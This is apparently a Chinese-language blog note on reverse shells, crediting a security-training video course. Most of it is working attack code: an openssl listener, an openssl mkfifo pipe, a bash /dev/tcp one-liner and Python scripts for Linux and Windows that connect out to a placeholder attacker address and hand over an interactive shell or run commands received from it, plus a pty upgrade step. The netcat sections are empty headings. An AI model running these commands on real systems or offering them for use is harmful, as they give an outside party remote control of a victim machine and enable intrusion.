【笔记】反弹Shell

发表于 更新于 阅读次数:

前言

反弹Shell

攻击者监听反弹Shell

通过NetCat监听反弹Shell

通过SSL监听反弹Shell

  1. 生成不含主题的SSL证书

传送门

  1. 监听反弹Shell
1
openssl s_server -quiet -key private.key -cert public.crt -port <port>

受害者反弹Shell

通过NetCat反弹Shell

通过SSL

1
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ip>:<port> > /tmp/s;

通过Linux的dev建立连接

1
bash -i >& /dev/tcp/<ip>/<port> 0>&1

通过Python建立连接

Linux

1
2
3
4
5
6
7
8
9
import os,socket,subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ip>", <port>))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
while True:
    subprocess.call(["/bin/bash", "-i"])

Windows

1
2
3
4
5
6
7
8
9
10
import socket,subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ip>", <port>))
while True:
    cmd = s.recv(1024)
    if cmd:
        process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = process.stdout.read() + process.stderr.read()
        s.send(output)

进入交互式Shell

  • 受害者反弹Shell成功后,在攻击者机中启动交互式Shell

Python

1
python -c 'import pty; pty.spawn("/bin/bash")'

完成

参考文献

哔哩哔哩——千锋教育网络安全学院